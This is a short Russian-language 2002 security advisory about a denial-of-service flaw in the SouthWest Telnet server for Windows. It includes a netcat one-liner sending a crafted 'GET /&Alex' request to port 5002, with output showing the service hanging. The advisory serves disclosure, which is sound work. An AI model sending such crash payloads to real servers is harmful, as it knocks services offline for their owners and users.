Security Lab

DoS против SouthWest

Дата публикации:27.03.2002
Всего просмотров:1127
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

SouthWest - бесплатный Telnet сервер для Windows. Программа включает полную поддержку ANSI цвета, справочную систему, интуитивный интерфейс, и оптимизацию скорости.
Сервер по умолчанию открывает следующие порты:
* Main listening on port 5000.
* Netlink listening on port 5001.
* HTTP server listening on port 5002.

При принятии HTTP запроса (5002 порт), обработанного специальным образом, SouthWest зависнет.
Пример:
$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK
 

Ссылки: Источник